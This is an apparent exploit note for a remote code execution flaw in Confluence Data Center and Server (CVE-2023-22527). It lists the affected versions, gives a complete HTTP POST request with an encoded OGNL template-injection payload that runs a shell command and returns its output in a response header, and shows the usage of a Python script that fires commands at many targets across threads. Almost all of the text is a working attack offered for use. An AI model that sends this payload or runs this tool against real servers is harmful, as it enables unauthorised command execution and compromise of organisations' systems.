Confluence Data Center and Server 8.0.xConfluence Data Center and Server 8.1.xConfluence Data Center and Server 8.2.xConfluence Data Center and Server 8.3.xConfluence Data Center and Server 8.4.x8.5.0 <= Confluence Data Center and Server <= 8.5.3

POST /template/aui/text-inline.vm HTTP/1.1Host:xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/115.0.0.0 Iron Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 368Connection: closelabel=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29

https://github.com/YongYe-Security/CVE-2023-22527

usage: python3 CVE-2023-22527.py -u <target> [-f <file>] -c <cmd>options:  -h, --help            show this help message and exit  -u TARGET, --target TARGET                        Target URL  -f FILE, --file FILE  URL file  -c CMD, --cmd CMD     Commands to execute  -t THREAD, --thread THREAD                        Number of threads